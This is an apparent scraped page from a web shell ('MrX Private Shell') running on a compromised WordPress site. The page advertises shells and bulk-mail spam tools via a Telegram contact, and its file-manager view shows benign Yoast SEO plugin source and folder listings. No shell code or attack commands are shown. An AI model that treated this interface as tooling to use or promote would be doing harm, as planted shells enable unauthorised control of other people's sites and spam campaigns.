__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

namespace Yoast\WP\SEO\Integrations\Admin;

use Yoast\WP\SEO\Conditionals\Admin_Conditional;
use Yoast\WP\SEO\Helpers\Date_Helper;
use Yoast\WP\SEO\Integrations\Integration_Interface;

/**
 * Cron_Integration class.
 */
class Cron_Integration implements Integration_Interface {

	/**
	 * The indexing notification integration.
	 *
	 * @var Date_Helper
	 */
	protected $date_helper;

	/**
	 * {@inheritDoc}
	 */
	public static function get_conditionals() {
		return [ Admin_Conditional::class ];
	}

	/**
	 * Cron_Integration constructor
	 *
	 * @param Date_Helper $date_helper The date helper.
	 */
	public function __construct(
		Date_Helper $date_helper
	) {
		$this->date_helper = $date_helper;
	}

	/**
	 * {@inheritDoc}
	 */
	public function register_hooks() {
		if ( ! \wp_next_scheduled( Indexing_Notification_Integration::NOTIFICATION_ID ) ) {
			\wp_schedule_event(
				$this->date_helper->current_time(),
				'daily',
				Indexing_Notification_Integration::NOTIFICATION_ID
			);
		}
	}
}

Filemanager

Name Type Size Permission Actions
addon-installation Folder 0775
activation-cleanup-integration.php File 1.85 KB 0775
admin-columns-cache-integration.php File 7.6 KB 0775
background-indexing-integration.php File 10.75 KB 0775
check-required-version.php File 4.86 KB 0775
crawl-settings-integration.php File 10.89 KB 0775
cron-integration.php File 1005 B 0775
deactivated-premium-integration.php File 4.21 KB 0775
first-time-configuration-integration.php File 15.18 KB 0775
first-time-configuration-notice-integration.php File 4.99 KB 0775
fix-news-dependencies-integration.php File 1.55 KB 0775
health-check-integration.php File 2.69 KB 0775
helpscout-beacon.php File 12.77 KB 0775
import-integration.php File 8.63 KB 0775
indexables-exclude-taxonomy-integration.php File 1.39 KB 0775
indexing-notification-integration.php File 6.95 KB 0775
indexing-tool-integration.php File 7.29 KB 0775
installation-success-integration.php File 4.05 KB 0775
integrations-page.php File 9.8 KB 0775
link-count-columns-integration.php File 7.53 KB 0775
menu-badge-integration.php File 916 B 0775
migration-error-integration.php File 1.35 KB 0775
old-configuration-integration.php File 1.65 KB 0775
redirect-integration.php File 1.72 KB 0775
redirects-page-integration.php File 1.42 KB 0775
unsupported-php-version-notice.php File 4.83 KB 0775
workouts-integration.php File 11.05 KB 0775
Filemanager